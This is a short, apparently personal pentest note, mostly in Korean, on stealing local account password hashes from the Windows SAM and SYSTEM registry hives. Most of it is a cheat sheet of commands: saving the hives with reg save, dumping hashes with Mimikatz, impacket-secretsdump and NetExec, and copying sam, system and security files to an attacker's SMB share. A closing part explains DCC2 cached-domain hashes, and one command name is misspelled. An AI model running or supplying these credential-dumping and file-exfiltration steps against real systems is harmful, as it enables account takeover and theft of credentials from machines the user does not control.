요약

• SAM은 로컬 계정 비밀번호가 저장된 파일이다.
• 이 장부를 읽으려면 SYSTEM 파일에 있는 열쇠가 꼭 필요하다.
• 공격자가 이 두개를 모두 손에 넣으면 그 컴퓨터의 모든 로컬 계정 권한을 장악할 수 있다.
• [[LSASS]]는 메모리(휘발성)에 들고 있지만, SAM은 하드디스크에 저장해 둔 장부다.

위치

C:\\\\Windows\\\\System32\\\\config\\\\directory
# The files are locked while Windows is running.

# Backups of the files may exists in the
C:\\\\Windows\\\\Repair
# or
C:\\\\Windows\\\\System32\\\\config\\\\RegBack

공격

reg save hklm\\\\sam C:\\\\sam
reg save hklm\\\\system C:\\\\system

Option 1: Mimikatz

lsadump::sam /sam:"C:\\\\sam" /system:"C:\\\\system"

Option 2: impacket-secretsdump

impacket-secretsdump WRK/Administrator:pass123@$IP -output local_dump

impakcet-smbserver share . -smb2support -user test -password test

net use \\\\$IP\\share /user:test test

copy sam \\\\<IP>\\share
copy system \\\\<IP>\\share
copy security \\\\<IP>\\share

impacket-secretsdump -sam sam.save -security security.save -system system.save LOCAL

Option 3: NetExec

nxc smb <IP> --local-auth -u <username> -p <password> --sam

DCC2 hashes

• hklm\\\\security contains cached domain logon information, specifically in the form of DCC2 hashes. These are local, hashed copies of network credential hashes.
• This type of hash is much more difficult to crack than an NT hash, as it uses PBKDF2.
• It cannot be used for lateral movement with techniques like Pass-the-Hash .